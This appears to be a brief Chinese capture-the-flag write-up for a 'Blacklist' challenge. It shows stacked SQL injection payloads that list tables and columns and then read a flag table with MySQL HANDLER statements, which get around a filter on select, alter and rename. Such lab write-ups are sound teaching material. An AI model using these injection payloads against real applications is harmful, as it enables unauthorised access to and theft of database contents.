测试:1
Blacklist(堆叠注入,handler代替select)
测试:1’ //有报错
Blacklist(堆叠注入,handler代替select)
测试发现union select语句可以回显出waf
Blacklist(堆叠注入,handler代替select)
利用堆叠注入查表1’;show tables;–+ // ; 结束上一条sql语句,再继续构造下一条语句。堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制。
Blacklist(堆叠注入,handler代替select)
查字段1’;show columns from FlagHere;–+
Blacklist(堆叠注入,handler代替select)
1’;handler FlagHere open; handler FlagHere read first; // 题目过滤了alter,rename,select。使用handler代替select进行查询。
Blacklist(堆叠注入,handler代替select)

参考:
堆叠注入:https://www.cnblogs.com/0nth3way/articles/7128189.html
Handler:https://dev.mysql.com/doc/refman/5.7/en/handler.html

相关文章:

  • 2022-12-23
  • 2021-09-05
  • 2022-12-23
  • 2021-06-18
  • 2021-07-31
  • 2022-12-23
  • 2021-07-27
猜你喜欢
  • 2022-12-23
  • 2021-08-08
  • 2021-05-06
  • 2022-01-08
  • 2021-11-06
  • 2021-04-05
  • 2021-06-10
相关资源
相似解决方案